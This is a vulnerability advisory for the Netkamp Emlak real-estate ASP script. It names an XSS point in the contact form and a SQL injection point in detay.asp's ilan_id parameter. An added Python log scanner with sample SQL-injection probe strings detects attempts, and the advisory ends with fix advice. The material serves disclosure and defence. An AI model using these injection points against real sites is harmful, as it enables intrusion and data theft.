Netkamp Emlak Scripti XSS & SQL Injection Vulnerabilities
#Software: Netkamp Emlak Scripti
#download: not free (350 YTL), sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )
#Exploit & example:
-----------------------------------------------------------------------
#XSS:
http://www.site.com/script_path/iletisim.asp
Enter XSS code into the text boxes of the script's contact form.
Example:
İletişim Formu (contact form)
Adınız (first name): ">
Soyadınız (last name): ">
E-Mail: ">
Konu (subject): ">
Mesajınız (message): ">
Press the "gönder" (send) button.
This XSS works on the contact page of the "Netkamp Emlak Scripti" script.
-----------------------------------------------------------------------
#SQL Injection:
http://www.site.com/script_path/detay.asp?ilan_id=[SQL]
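A detection check for the detay.asp parameter named above, added here as an example and not part of the original advisory or the vendor's code. It assumes ilan_id is a numeric listing id and that the web server log uses the field order shown; the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample log (not from the advisory). Assumed field order:
# date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-03-01 10:00:01 GET /script_path/detay.asp ilan_id=42 192.0.2.10 200
2008-03-01 10:00:05 GET /script_path/detay.asp ilan_id=42%27 192.0.2.77 500
2008-03-01 10:00:09 GET /script_path/default.asp - 192.0.2.10 200
2008-03-01 10:00:12 GET /script_path/DETAY.ASP ilan_id=7+or+1%3D1 192.0.2.77 200
2008-03-01 10:00:15 GET /script_path/detay.asp sayfa=2&ilan_id=15 192.0.2.11 200
2008-03-01 10:00:20 GET /script_path/detay.asp ilan_id=3&ilan_id=x 192.0.2.77 200
"""

# Assumption: a legitimate ilan_id is a short run of ASCII digits.
INTEGER = re.compile(r"[0-9]{1,10}")


def suspicious_requests(log_text, page="detay.asp", param="ilan_id"):
    """Return (client_ip, raw_query) for requests to `page` where any
    value of `param` is not a plain ASCII integer (blank values included)."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # header/comment line or malformed entry
        stem, query, client_ip = fields[3], fields[4], fields[5]
        if not stem.lower().endswith("/" + page):
            continue
        # ASP matches query-string names case-insensitively, so compare
        # lowercased names; parse_qsl also URL-decodes the values.
        values = [v for k, v in parse_qsl(query, keep_blank_values=True)
                  if k.lower() == param]
        if any(not INTEGER.fullmatch(v) for v in values):
            hits.append((client_ip, query))
    return hits


if __name__ == "__main__":
    for ip, query in suspicious_requests(SAMPLE_LOG):
        print(ip, query)
```

Log review only shows attempts; the fix belongs in the script itself: convert ilan_id to an integer or bind it as a query parameter in detay.asp, and HTML-encode the contact form values before they are written back to a page.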
-----------------------------------------------------
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM